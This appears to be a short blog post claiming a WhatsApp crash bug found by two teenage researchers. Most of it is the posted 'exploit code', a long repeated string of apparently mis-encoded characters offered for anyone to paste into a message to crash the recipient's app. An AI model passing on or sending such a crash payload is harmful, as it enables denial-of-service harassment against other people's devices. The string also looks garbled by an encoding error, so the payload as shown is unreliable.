Crashing Whatsapp With Just An Message!!! Whatsapp being Worlds most favourite chatting messenger now can be expoilted through a " Message ". Two 17 year researches from India have Developed it namely Indrajeet Bhuyan & Suarav Kar. They have submitted the Video for POC :) The Video Also Can Be Watched Here The Expoilt Code is: ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ 㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊 ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ ...
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